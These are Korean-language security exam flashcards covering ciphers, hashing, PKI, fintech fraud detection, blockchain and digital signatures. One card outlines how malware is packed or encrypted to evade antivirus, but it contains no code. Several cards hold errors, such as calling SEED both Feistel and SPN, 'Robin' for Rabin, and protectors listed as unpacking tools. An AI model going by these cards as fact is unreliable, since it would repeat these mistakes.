Security Flashcards

1
Q

암호화

A
▣ 암호화의 정의 : 평문을 암호화된 문장으로 변환하는 기술
▣ 암호화의 특성 (기무가부인)
- 기밀성(암/복호화), 무결성(해쉬함수), 가용성(암호/인증), 부인봉쇄(전자서명), 인증(인증서)
▣ 암호화 알고리즘의 원리 (대블치확압)
- 대체, 블록화, 치환, 확장, 압축
▣ 암호화의 구성요소
- 평문, 암호문, 암호화, 복호화, 키, 암호 알고리즘, 암호 시스템
▣ 암호화의 분류
1. 양방향 (기밀성)
  가. 대칭키 (비밀키암호화, 암호화키=복호화키, 데이터암호목적)
    1) Stream방식 (1bit씩 연산, XOR연산, H/W 구현용이, Confusion(Substitution))
      - True Random# : OTPad
      - Psuedo Random# : RC4(PPTP, WEP, TKIP)
    2) Block방식 (2bit 이상 묶음 연산, Confusion-Diffusion(S-Box+P-Box), S/W 구현용이
      - Festel구조 : DES, 3DES
      - SPN구조 : AES
      - 기타 : IDEA(유럽)
  나. 비대칭키 (공개키암호화, 암호화키≠복호화키, 대칭키교환용도)
    1) 인수분해 : RSA(디지털서명, PGP), Robin
    2) 이산대수 : DH(키교환), ElGmal, DSA(디지털서명)
    3) 타원곡선방정식 : ECC
2. 단방양 (무결성)
  가. HASH
    1) MDC
      - Modification Detection
      - Key 없음
      - SHA-1, MD5, HAVAL
    2) MAC
      - Message Authentication
      - Key 있음
      - HMAC, NMAC, CBC-MAC
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

암호화 기술

A
  • SPN (Substitution-Permutation Network) : AES, ARIA
  • Feistel : DES, SEED
  • 인수분해 : RSA
  • 타원곡선 : ECC
  • 이산대수 : Diffie-Hellman, DSA
  • 해시 알고리즘 : MD-5, SHA-1, SHA-2
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

SPN (Substitution-Permutation Network)

A
  • 대체순열구조
  • 전치와 치환을 이용한 관용암호 방식 (암/복호화에 동일한 키를 사용하는 방식)
  • 128비트를 4x4 행렬로 나타내어 암호화
  • AES, ARIA
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Feistel

A
  • N 비트의 블록을 N/2 씩 둘로 나누고, R번의 라운드 만큼 반복된 연산
  • 라운드 함수를 반복적으로 적용, 이전 블록 암호문과 평문을 XOR한 형태
  • DES, SEED
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

인수분해

A
  • 두 큰 소수 p와 q의 곱셈은 쉬우나 n으로 부터 p와 q를 추출하기 어려운 점 이용

- RSA

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

타원곡선

A
  • 타원 기반의 안정성과 효율성 기반의 알고리즘
  • PKI 기반의 RSA의 문제점인 속도와 안정성을 해결
  • ECC
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

이산대수

A
  • 이산대수의 계산은 어렵지만, 그 역함수/지수함수의 계산은 빠르게 수행하는 특징을 이용

- Diffie-Hellman, DSA

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

해시 알고리즘

A
  • 단방향 : 원래의 입력값을 찾아내기 불가능
  • 임의의 길이를 가지고 있는 메시지를 받아들여 고정된 길이의 출력 값으로 바꾸어주는 알고리즘
  • MD-5, SHA-1, SHA-2
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

블록 암호화

A

▣ 개념 : 고정된 크기의 블록단위 암호문 생성
▣ 단위 : 블록단위
▣ 사례 : DES, AES, SEED, ARIA

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

스트림 암호화

A
▣ 개념
- 평문과 같은 길이의 키 스트림을 생성하여 평문과 키 이진 수열을 비트단위로 배타적 논리합 이진연산으로 결합하여 암호문 생성
- 키스트림 -> 비트단위 배타적 논리합 -> 이진연산 결합
▣ 단위 : 비트단위
▣ 사례 : LFRS, SEAL, RC4
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

비밀키 암호화 (대칭키)

A
▣ 개념도 : 원문 -> 비밀키 -> 암호문 -> 비밀키 -> 복호화
▣ 개념 : 동일한 키로 암/복호화
▣ 사례 : DES, SEED, AES
▣ 키의 관계 : 암호키 = 복호키
▣ 키의 수 : 두 사람이 하나의 비밀키 공유
▣ 키의 종류 : 암/복호화키 (Secret Key)
▣ 구현방식 : 블록, 스트림 암호화
▣ 키의 관리 : 복잡 (모든 당사자 간 키 공유 필요)
▣ 부인방지 여부 : 불가
▣ 속도 : 상대적 빠름
▣ 용도 : 개인 파일 암호화
▣ 장점 : 구현용이, 속도빠름
▣ 단점 : 쉬운 해독, 키관리 어려움, 키 분배 문제
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

공개키 암호화 (비대칭키)

A
▣ 개념도 : 원문 -> 공개키-> 암호문 -> 비밀키 -> 복호화
▣ 개념 : 송/수신자 다른 키 사용
▣ 사례 : RSA, ECC
▣ 키의 관계 : 암호키 ≠ 복호키
▣ 키의 수 : 키 쌍(Private Key, Public Key) 공유
▣ 키의 종류 : 암호화(Public Key), 복호화(Private Key)
▣ 구현방식 : 소인수문해, 이산대수, 근저백터
▣ 키의 관리 : 상대적 단순, 인증기관 통한 Private Key발급
▣ 부인방지 여부 : 키의 이원화로 부인방지
▣ 속도 : 연산속도 느림 (큰 소수 찾기, 방정식 연산)
▣ 용도 : 다수의 사용자 사용
▣ 장점 : 암호해독 어려움, 전자서명, 키 분배 용이
▣ 단점 : 해독시간 상대적 느림
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

DES (Data Encryption Standard)

A
▣ 정의 : 56bit의 키를 이용, 64bit의 평문 블록을 64bit의 암호문 블록으로 만드는 블록 암호 방식의 미국표준
▣ 알고리즘
- 대칭키 방식
- key 생성 부분과 데이터 암호화 부분으로 나뉨
- 치환과 XOR에 의한 전치과정을 거침
- f함수에서 48bit의 문자열을 32bit로 바꾸는 8개의 논리회로인 S-box 사용
▣ 문제점
- S-BOX 논리식 약점 (Shift, XOR)
- 키 길이가 짧아 Brute Force Attack 가능
▣ 보완대책
- 2-DES, 3-DES 사용
- Blowfish, RC5, IDEA등 보완 알고리즘
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

RSA (Rivest, Shamir, Adleman)

A
▣ 정의 : 큰 소인수 곱 n=p*q의 소인수 p, q를 찾는 것이 어렵다는 것을 근간으로 만들어진 알고리즘
▣ 안전성 문제
- 소수 p, q에 의해 좌우됨
- p, q는 거의 같은 크기의 소수여야 안전함
- p-1, q-1은 큰 소수를 인수로 가져야 안전함
- p-1, q-1의 최대 공약수는 작아야 안전함
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

ECC (Elliptic Curve Crypto System)

A
▣ 정의 : 타원 기반의 구조체의 안정성과 효율성을 기반으로 생성된 알고리즘
▣ 원리
- 이산 대수를 사용하여 하나의 키에 대하여 해를 구할 수 없게 만듦
- 타원 곡선의 굴곡률 값으 방정식에서 값을 구할 수 없는 좌표 값에 의해 비대칭키 생성
▣ 필요성
- 공개키 알고리즘인 RSA의 속도와 기밀성 문제의 해결
- IC카드, PDA등 휴대 단말기에서 HW적인 암호 알고리즘의 구현 필요성
- 무선 인터넷의 발달로 적은 메모리에 빠른 암/복호화 알고리즘의 필요성
▣ 특징 (설안소유)
- 설계성 : 타원곡선 변경성
- 안전성 : 일방향성 암호화
- 소규모 : 적은 비트 키
- 유연성 : HW, SW 구현 용이
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

AES (Advanced Encryption Standard)

A
▣ 정의 : 미국의 연방 표준 알고리즘(1998년)으로서 20년이 넘게 사용되어 온 DES를 대신할 차세대 표준 알고리즘
▣ 특징
- 가변 길이 블록과 키 사용 가능 (128, 192, 256)
- 단순한 설계, 다양한 플랫폼 적용
▣ 단계 (1회의 순열과 3회의 치환)
- 바이트 치환 : 하나의 S-BOX 치환
- 행이동 : 단순 순열
- 열 혼합 : GF 산술 치환
- 라운드 키 추가 : 비트 단위 XOR 연산
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

SEED

A
▣ 정의: 순수 국내기술로 개발하여 ISO/IEC 및 IETF의 표준으로 제정된 128비트 블록 암호 알고리즘
▣ 특징
- 검증된 Feistel구조 활용
- IPSec, 인터넷뱅킹 등 상용분야 표준
▣ 개념도
- 128bit 평문 -> 16bit 블럭화 -> 16회 라운드 -> 블럭조합 -> 암호문 생성
▣ 설계기준
- 데이터 처리 단위 : 8, 16, 32bit 모두 가능
- 암/복호화 방식 : 블록 암호 방식
- 입/출력문의 크기 : 128bit
- 입력 key의 크기 : 128bit
- 안전성 : DC/LC에 대하여 안전
- 효율성 : 3중 DES 보다 암/복호화 속도 빠름
- 내부함수 : SPN 구조
- 라운드 수 : 16라운드
- 키생성 알고리즘 : 라운드 동작과 동시에 암/복호화 라운드 키가 생성
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

ARIA (Academy, Research Institute, Agency)

A

▣ 정의 : 경량 환경 및 하드웨어 구현을 위해 최적화된, Involutional SPN 구조를 갖는 범용 블록 암호 알고리즘
▣ 특징
- 블록 크기 : 128비트
- 키 크기 : 128/192/256 비트
- 전체 구조 : Involutional Substitution-Permutation Network
- 라운드수 : 12/14/16 (키 크기에 따라 결정됨)
▣ 암/복호화 과정
- 대치, 확산, 키 적용 단계를 반복하는 SPN 구조로써, 대치 단계에서는S-Box를 이용하여 바이트 단위로 치환을 하고, 확산 단계에서는 16x16 Involution 이진 행렬을 사용한 바이트 간의 확산을 함
- 대치단계(S-BOX 치환) -> 확산단계(16x16 Involution)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

해시함수(Hash)

A
▣ 정의 : 하나의 문자열을 보다 빨리 찾을 수 있도록 해시함수를 이용하여 해시테이블 내 주소에 직접 접근할 수 있는 짧은 길이의 값이나 키로 변환하는 과정
▣ 목적
- 단방향 암호화, 전자서명
▣ 구성요소
- 해싱함수 : 키값 - 레코그 물리주소 사상함수
- 해시키 : 레코드의 키값
- 버킷 : 한 개의 주소를 갖는 파일 내의 한 구역(여러개의 슬록으로 구성)
- 슬롯 : 한 개의 레코드를 저장할 수 있는 공간
- 해시테이블 : 해싱 함수에 의해서 계산된 주소
- Synonym : 같은 버킷 주소를 갖는 레코드 들의 집합
- 충돌 : 서로 다른 레코드들이 같은 주소로 반환되는 경우
▣ 종류
- 제산함수(%) : 나머지 연산 (12 = 512 % 100)
- 제곱함수 : 키값의 제곱 (512 제곱 = 262144, 21이 최종주소)
- 폴딩함수 : 탐색키 전체 사용 (이동폴딩, 경계폴딩)
Ex) 123456789012
가정 : 3개로 나눔
이동폴딩 : 123+456+789+012
경계폴딩 : 123+654+789+210
- 중간 제곱 함수 : 탐색키 제곱 (4x4 = 16. 16를 2로 나눈 8을 해시키로 선택)
- 숫자 분석 : 탐색키의 특징 (대학교 학번)
- 난수법 : 난수 발생
- 기수법 : 개수의 숫자를 사용
▣ 해시 함수 적용 암호화 기술
- MD5(Message Digest) : 128비트 해시 함수
- SHA-1(Secure Hash Algorithm) : 160비트 해시 함수
- HAVAL : MD5 변형
- Tiger : 64비트 프로세서에서의 해시
▣ 해시함수의 유형
- 패쇄해싱 : 정적 해싱 (컴파일러, 어셈블러)
- 개발해싱 : 동적 해싱 (데이터베이스 시스템)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

정적 해싱(Static Hashing) 기법

A

▣ 개념 : 버킷 주소 집합의 크기를 고정시켜 처리하는 기법
▣ 특징
- 현재 파일의 크기에 근거하여 해싱 함수 선택
- 미래의 특정 시점의 파일 크기를 예상하여 해싱 함수 선택
- 파일 크기가 커짐에 따라 주기적으로 해싱 구조를 재구성
▣ 문제점
- Collision : 복수개의 키 값이 동일 Hash 주소 사용
- Overflow : 빈 버킷이 없는 상태에서 Hash 주소가 다시 지정된 상태
▣ 해결방안
- Direct Chaining : 동일 Hash Table에서 Linked List 구성
- Indirect Chaining : 별도의 Overflow 공간 확보, Synonym을 Linked list 로 구성
- Overflow 영역 처리 : Link를 두지 않고 Overflow영역에 저장

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

동적 해싱 (Dynamic Hashing) 기법

A
▣ 개념 : 데이터베이스가 확장 또는 축소되는데 이에 맞추어 해싱 함수를 동적으로 변경 시키는 해싱 기법(Overflow 발생시 2배수 확장)
▣ 확장 해싱(Extensible Hashing)의 개념
- 동적 해싱의 한 형태이며 트리의 깊이가 2인 특별한 경우
▣ 확장 해싱의 장점
- 파일 크기가 증가해도 성능이 나빠지지 않음
- 버킷 주소 테이블의 크기가 작으므로 저장 공간 절약
▣ 확장 해싱의 단점
- 버킷 주소 테이블 생성 부담
- 데이터의 숫자가 적으면 오히려 디스크 낭비
▣ Collision 해결 방법
- Linear Method : 주소 + 1로 빈 곳을 찾아 계속 검색
- Re-Hashing : Overflow 발생하지 않을 때까지 여러개의 Hash 함수 적용
- Random Method : 난수로 후속 주소 선택 방법
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

LEA (Light Weight Encryption Algorithm)

A

▣ 정의 : 사물인터넷의 발달에 따라 고속, 경량화를 위해 최적화하여 개발된 128비트 블록 암호 알고리즘
▣ 개발배경
- IoT, 인터넷 기기, 네트워크 발달, 저전력 특성을 고려한 암호화 기술 필요
- 128비트 데이터 블록 알고리즘, 안전성 및 경량 구현 가능
▣ 암복호화 함수
- 입출력 128비트, 라운트 키 PK 192 비트
- 라운드 함수를 구성하는 내부연산은 32비트 덧셈 배열 형태 사용
- 내부연산은 32비트 덧셈, XOR, OR, ROLn(RORn)은 n비트 좌측(우측)회전 연산
▣ 키스케쥴 함수
- 비밀키 길이에 따라 라운드 키 생성 방법을 별도로 정의
- 키 스케쥴 함수의 입력값은 32비트

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

바이러스 압축

A

▣ 개념
- 악성코드의 분석을 어렵게 하기 위해 실행코드 암호화나 패킹등의 은닉기술
▣ 목적
- 전파확산 : 작은 사이즈
- 탐지우회 : 분석도구 탐지 회피
- 리버싱방지 : 분석 난해화
▣ 악성코드 보호 기법
- 압축 기법 : 정상 파일을 압축 악성코드와 패킹하여 백신 프로그램을 우회하고 파일사이즈를 줄여 전파
- 암호화 기법 : 암호화된 악성코드를 작성하고 실행시에 복호화 하여 실행하는 기법
▣ 압축 기법 동작과 탐지
1. 악성코드 생성
- 압축패킹 도구 : UPX, PEcompact, ASPack, UPack, PESpin, NSAnti, ACProtect
2. 악성코드 실행
- 압축해제도구: ASProtect, Themida, SVKP, UltraProtect, Morphine
3. 악성코드 탐지
- 탐지도구 : PEIDSignature, MRC(Mandiant Red Curtain), Exeinfo PE, FastScanner
▣ 악성코드 분석방법
- 정적분석 : 디버거와 디어셈블러 통한 코드/바이너리 비교
- 동적분석 : 파일이나 레지스트리 생성 및 수정 등의 행위를 관찰하여 분석

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

데이터 마스킹

A
▣ 정의 : 기밀데이터의 속성(길이,유형,형식)을 유지한채, 새롭고 읽기 쉬운 데이터를 익명으로 생성하는 기술
▣ 특징 : 데이터의 자동 변조, 실 데이터 보호, 데이터 무결성 유지 역할
▣ 유형
- 정적인 데이터 마스킹 : ETL 단계
- 동적인 데이터 마스킹 : 조회 시
▣ 기술
- 치환 : BLARK -> BL***
- 셔플 : BLARK -> LABRK
- 숫자와 날짜 변경 : 02-15 -> 03-05
- 암호화 : 02020-12312 -> 암호화
- 널처리나 삭제 : 카드번호 -> NULL
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

PKI (Public Key Infrastructure)

A
▣ 정의 : 인증기관(CA)에서 공개키/개인키를 포함하는 인증서를 발급받아 네트워크상에서 안전한 비밀통신을 가능하게 하는 기반 구조
▣ 목적
- 부인봉쇄 : 전자서명
- 인증 : 전자인증서
- 무결성 : 접근차단
- 기밀성 : 암호화
▣ 구성요소
- 인증기관(CA, Certificate Authority) : 인증서 등록, 발급, 조회, 관리, CRL 생성
- 등록대행기관(RA, Registration Authority) : 인증서등록, 사용자 신원확인
- 인증서저장소(CR, Certificate Repository) : CRL 보관
- 인증폐지목록(CRL, Certificate Revocation List)
- 디렉토리 : 인증서 및 CRL 저장
- 사용자 : 사용 주체
▣ 인증서(X.509)
- 버전
- 일련번호
- 서명알고리듬 : 해시 알고리즘
- 발급자
- 유효기간 시작
- 유효기간 종료
- 주체 : 인증서 소유자
- 공개 키 : 키 종류 및 길이
- 손도장 알고리즘 : 해시 알고리즘
- 손도장 : 데이터 다이제스트
- 이름
- 향상된 키 사용
▣ 인증서 취소 목록 (CRL)
- Signature : 서명알고리즘
- Issuer : CRL 발행자 이름
- This update : 갱신일
- Next update : 다음 갱신일
- Revoked Certificates : 취소된 인증서의 일련번호
- CRL Extension : 부가정보
- Issuer's signature
▣ 인증서 검증방식
- CRL(Certificate Revocation List)
- OCSP(Online Certificate Status Protocol)
- SCVP(Simple Certificate Validation Protocol)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

CRL (Certificate Revocation List)

A
  • 인증서에 대한 폐지 목록

- CA는 페지된 인증서 정보를 가지고 있는 CRL을 통해서 인증서의 유효성을 최신의 상태로 유지

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

OCSP (Online Certificate Status Protocol)

A
  • 실시간으로 인증서의 유효성을 검증 할 수 있는 프로토콜
  • CRL을 대신하거나 보조하는 용도로 사용
  • Client-Server 방식의 상태 정보 송수신
  • 고액의 거래를 주로 하는 은행업무, 클라이언트에 인증서 모듈을 실행하기 어려운 이동 단말기에서의 전자 거래 등에 활용
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

SCVP (Simple Centiicate Validation Protocol)

A
  • 인증서의 유효성 여부와 특정 인증서까지의 인증서 체인을 제공

- 인증서를 발행하는 인증기관, 인증서, CRL을 저장하는 저장소 지원

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

PKI를 이용한 전자봉투

A
▣ 송신자
1. 비밀키 임의 생성
2. 생성된 비밀키로 메시지 암호화(대칭키 알고리즘)
3. B의 공개키로 비밀키 암호화
▣ 수신자
1. B의 개인키로 비밀키 복호화
2. 복호화된 비밀키로 메시지 복호화
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

핀테크

A
▣ 정의 : 금융과 기술의 융합을 통해 결제, 송금, 개인 자산관리 등의 각종 금융 서비스를 제공하는 기술
▣ 기술
- 보안 : 지문인식, 바이오인식
- 통신 : NFC, Beacon, Geo-fencing
- 분석 : BigData
▣ 서비스 현황
- 국내 : 삼성페이, 시럽, 카카오페이
- 해외 : 애플페이, 구글월렛
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

핀테크 활성화를 위한 보안정책

A
▣ 정자금융 규제 패러다임 전환
- 사전규제 최소화
- 기술중립성 원칙 구현
- 책임부담 명확화
▣ 금융보안 토대 소비자 보호
- 보안인증(PCI-DSS, ISMS) 획득 유도
- FDS구축 고도화 독려
▣ 오프라인 금융제도 개편
- 인터넷 전문은행 모델 수립
- 결제분야 낡은 규제정비
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

핀테크 서비스 안전성 확보방안 및 FDS 고도화 로드맵

A
▣ 예방측면
- 본인 인증강화 : 생체인증, 전자서명
- 모바일 단말보안 : TEE(Trusted Execution Environments)
▣ 탐지측면
- FDS구축 및 고도화
▣ 대응측면
- 업무연속성 BCP 대책
▣ FDS고도화 로드맵
1단계) : 도입
- 단말기 접속정보 수집
- 오용탐지(Black List)
- 추가 인증 수단 마련
2단계) : 확대
- 금융거래 정보 수집
- 오용탐지, 이상거래 탐지
- 추가 인증 조치
- 모니터링 및 상담
3단계) : 공동대응
- 과거 패턴정보 구축
- 금융회사간 정보공유
- 추가 인증 조치
- 감사기능 구현
- FDS관련 법규 개정
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

PCI-DSS (Payment Card Industry Data Security Standard)

A
▣ 정의 : 가맹점 결제 대행 사업자가 취급하는 카드 회원의 신용 카드 정보 및 거래 정보를 안전하게 보호하기 위한 신용 업계 글로벌 보안 표준
▣ 특징
- 카드 회원정보와 인증정보를 포함하는 카드관련 정보의 안전한 저장, 처리 및 전송을 위해 적용
▣ 적용정보
1) 카드 회원 데이터
- 신용카드번호(PAN)
- 신용카드 소유자 이름
- 신용카드 만료일자
- 신용카드 서비스 코드
2) 인증 데이터
- 전체 마그네틱 선 데이터
- CAV2/CVC2/CVV2/CID
- PIN/PIN Block
▣ 요구사항
1. 안전한 네트워크 구축 및 유지
- 카드 회원 데이터를 보호하기 위해 방화벽을 도입, 최정의 설정을 유지
- 시스템 암호 및 기타 보안 매개 변수에 벤더가 제공하는 기본값을 사용하지 않는 것
2. 카드 회원 데이터 보호
- 저장된 카드 회원 데이터를 안전하게 보호
- 공용 네트워크에서 카드 회원 데이터를 보낼 때 암호화
3. 취약점 관리 프로그램의 정비
- 안티바이러스 소프트웨어를 이용하여 정기적으로 갱신
- 안전한 시스템과 어플리케이션을 개발, 유지보수
4. 강력한 엑세스 제어기법의 도입
- 카드 회원 데이터에 대한 접근을 업무상 필요한 범위 내로 제한
- 컴퓨터에 엑세스하는 사용자마다 개별ID를 할당
- 카드 회원 데이터에 대한 물리적 엑세스를 제한
5. 정기적인 네트워크 모니터링 및 테스트
- 네트워크 자원과 카드 회원 데이터에 대한 모든 접근을 추적하고 모니터링
- 보안 시스템 및 관리 절차를 정기적으로 테스트
6. 정보보안 정책의 점검
- 정보 보안 정책 점검
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

인터넷 전문은행

A
▣ 정의 : 오프라인 영업점 없이 비대면 실명 인증으로 인터넷, 모바일, ATM등의 전자매체를 통해 은행업무(수신, 여신)의 대부분을 수행하는 은행
▣ 구성요소
- 전산 설비 위탁 운영
- 지급결제망
- 신용카드
- 예금 보험 제도
- 실명 확인제도
▣ 도입 기대효과
1) 도입이전
- 은행점포 직접 방문
- 은행, 지급결제업체 서비스 분리
- 재무정보에 기반한 신용평가
- 제한된 PB 통한 대면 컨설팅
2) 도입이후
- 인터넷, 스마트폰 통한 계좌개설
- 간편결제, 결제포인트 연계 서비스
- 전자상거래 정보, 빅데이터 평가
- 자동화된 포트폴리오 분석
3) 기대효과
- 금융거래의 시,공간적 제약해소
- 소비자 결제 편의성 및 혜택증대
- 저신용자 대상 중 금리 대출 확대
- 더 많은 소비자가 이용 가능
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

핀테크 오픈 플랫폼

A
▣ 개념
- 금융기관과 별도의 제휴 없이 금융 서비스 API를 제공하는 핀테크 오픈 플랫폼
- 표준화된 금융API를 핀테크 기업에 제공하고 핀테크 기업은 이를 활용해 자체 서비스를 만들어 유통시키는 기술 플랫폼
▣ 기술스택
- 고객(모바일, 인터넷, ATM, Call Center)
- 인터넷전문은행, 수신/여신, 외환, 대행, 상품 팩토리, 핀테크 서비스
- 핀테크 오픈 플랫폼(OpenAPI, 금융API, 제휴API, 서비스API),(제휴관리, 서비스관리, 보안관리, 시스템관리, 레거시 연계)
- 은행 레거시
▣ 활용 방안
- 기술적관점 : 은행 업무 처리, Test-Bed
- 정책적관점 : 신규 금융 서비스모델 창출, 업무제휴, 진입 장벽 완화, 표준화
- 보안관점 : 공동대응, FDS
- 서비스관점 : 개인 맞춤형 제공, 신뢰성 향상
▣ 도입방안
- 금산 분리 규제 완화 : 은행 지분 보유한도(4%->5%)
- 최저 자본 하향조정 : 1000억 -> 500억
- 영업범위 : 일반은행과 동일
- 건전성 규제 : Basel1 기준 적용
- 전산설비 위탁 : 신용카드업 가능
- 인가절차 : 외부평가위원회 구성
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

FDS

A
▣ 정의 : 전자금융거래에 사용되는 단말기 정보, 접속정보, 거래내용을 종합적으로 분석하여 의심거래를 탐지하고 이상금융거래를 차단하는 시스템
▣ 주요기능 (정분대감)
- 정보수집 : 이용자 매체환경 정보, 사고유형 정보
- 분석 및 탐지 : 오용탐지, 이상탐지
- 대응 : 통지와 피드백 
- 모니터링 및 감사 : 수집, 분석, 대응 감사
▣ 방식
- 동기방식 : 매 거래 단계별 (인증, 예비거래, 본거래, 원장작성)
- 비동기방식 : 최종 승인 이전에 한번
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

FDS 오용탐지모델 (Misuse)

A
▣ 개념 : 과거에 발견되었던 부정행위패턴과 일치하는 부정행위를 찾아내는 방식
▣ 목적 : 알려진 사고의 차단 
▣ 기준 : 과거정보, 시그니처
▣ 시점 : 사후 탐지 개념
▣ 장점 : 과거정보가 많을수록 오탐율 하락
▣ 단점 : 새로운 형태의 부정행위 색출 한계 (미탐률이 높음)
▣ 절차 : 사고발생 -> 사고패턴생성 -> 이상금융거래 검출
▣ 모델 : 패턴탐지 모델, 상태전이 모델
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

FDS 이상탐지모델 (Anomaly)

A
▣ 개념 : 기존의 거래와 비교하여 급격하게 다른 형태, 낮은 확률의 행위를 찾아내는 방식
▣ 목적 : 알려지지 않은 사고의 예방
▣ 기준 : 이용자 프로파일
▣ 시점 : 사전 탐지 개념
▣ 장점 : 새로운 부정거래행위 사전탐지 가능
▣ 단점 : 긴 학습기간(프로파일링)과 오탐율이 높음
▣ 절차 : 이용자 프로파일링 -> 예측패턴생성 -> 이상금융거래 검출
▣ 모델 : 통계 모델, 데이터 마이닝 모델
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

블록체인

A
▣ 정의 : 분산데이터베이스의 한 형태로 분산 노드의 특정 사용자에 의한 임의조작이 불가능하도록 고안되어 지속적인 데이터 기록 리스트 블록을 잇따라 연결한 모음
▣ 특징
- 탈 중앙 : P2P 네트워크 간 공유
- 경제성 : 특허 없음
- 이중 지불의 방지 : 전체 P2P 노드들이 무결성 검증
- 합의 수렴 알고리즘 : 각 노드의 장부 데이터 최신 유지
▣ 적용원리
1) A가 B에게 송금요청
2) 해당 거래 정보가 담긴 하나의 블록 생성
3) 네트워크 상의 모든 참여자에게 블록 전송
4) 각 참여자가 해당 블록 승인
5) 각 참여자의 기존 블록 체인 기록에 추가 결합
6) 실제 송금 완료
▣ 핵심기술
- 사용자 간 분산 합의 : 신뢰성 보장
- 마이닝 : 컴퓨팅 자원 제공 대가
- 거래장부 동기화 : 보안성 향상
▣ P2P를 통한 거래장부의 무결성 유지절차
1) 모든 사용자는 인터넷을 통해 서로 연결된 P2P 네트워크 생성
2) 네트워크를 통해 동일한 거래장부를 복사해 각자 보관
3) 모든 사용자는 10분에 한 번씩 모여 거래장부를 검사
4) 만약 잘못된 정보가 있으면 분산 합의 절차에 의해 정상 장부를 복제해 대체
5) 거래장부 검사가 끝난 후 이것을 한 블록으로 생성
6) 새로 만든 블록을 블록체인 끝에 추가
7) 새로 만든 블록체인은 다시 모든 사용자가 복제해 감
8) 위 과정을 매 10분마다 반복
▣ 사용자간 분산 합의 절차
- 네트워크상의 거래 검증 권한을 갖는 사용자가 거래내역의 정당성을 승인
- 다수의 승인결과를 종합하여 정당한 거래로 인정하거나 제한
- 51% 과반수 이상의 일치된 의견을 따르게 됨(승인 또는 제한)
▣ 블록체인의 위조방지 개념
- Block 2는 Block 1의 해시값 Hash 1을 담고 있음
- 만약 Block 1의 내용을 수정하면 Hash 1이 바뀌게 되므로 Block 2도 수정해야 하며 이후 모든 블록도 수정필요
- 블록위조하는데 n개월 소요되며 그 시점에 이미 많은 리스트가 생성되어 위조가 거의 불가능함
▣ 블록체인이 금융을 혁신하는 이유
- 별도의 인프라 없이 신뢰성 확보
- 안전한 금융 시스템 제공
- 거래 내역이 투명하게 공개
- 고객정보가 필요 없음
▣ 블록체인 활용사례
- 비트코인
- P2P 대출
- 주식 거래
- 공인인증서
▣ 블록체인 응용분야 및 구현사례
- Cryptocurrency : Bitcoin, Bitshares, Altcoin
- Registry, Open ID : Dot-Bit, ONENAME
- Messaging : Reddit Style, Twitter Style
- IoT : M2M, SW Update, Energy Payment
- Cloud : SNS, Cloud Storage
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

전자서명

A
▣ 정의 : 서명자가 해당 전자문서에 서명하였음을 나타내기 위해 전자문서에 첨부되거나 논리적으로 결합된 저자적 형태의 정보
▣ 전자서명의 조건 (위인부분변재)
- 위조불가
- 인증
- 부인방지
- 분쟁해결
- 변경 불가
- 재사용 불가
▣ 처리절차
1) 송신자는 해쉬 함수를 이용하여 메시지의 해쉬 값을 구함
2) 구한 해쉬 값을 자신의 비밀키를 사용하여 암호화하여 서명을 생성
3) 메시지와 서명을 수신자에게 송신
4) 수신자는 송신자가 사용한 것과 동일한 해쉬 함수를 이용하여 메시지의 해쉬 값을 계산
5) 수신한 서명을 송신자의 공개키로 복호화 하여 그 결과값을 자신이 계산한 해쉬 값과 비교
6) 두 값이 동일한 경우, 서명이 정상적인 것으로 판단하고 메시지를 받아 들임
7) 두 값이 다를 경우, 수신자는 메시지를 거부
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q

혼돈(Confusion)

A

▣ 개념

  • 평문과 암호문 사이의 관계를 알기 어려워야 하는 이론
  • 평문 1비트의 변화가 생성되는 암호문에 어떤 변화를 초래할지 알 수 없어야 한다는 이론
  • 평문 1비트의 변화가 생성되는 암호문에 어떤식으로던 규칙이 발생하면 안된다는 이론
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

확산(Diffusion)

A

▣ 개념

  • 평문을 구성하는 각 비트들의 정보가 암호문 여러 비트에 영향을 받아야 한다는 이론
  • 평문 1비트를 변경했을 때 암호문의 1비트에만 영향을 받는 것이 아니라 암호문 전체 비트에 영향을 받을 수 있어야 한다는 이론
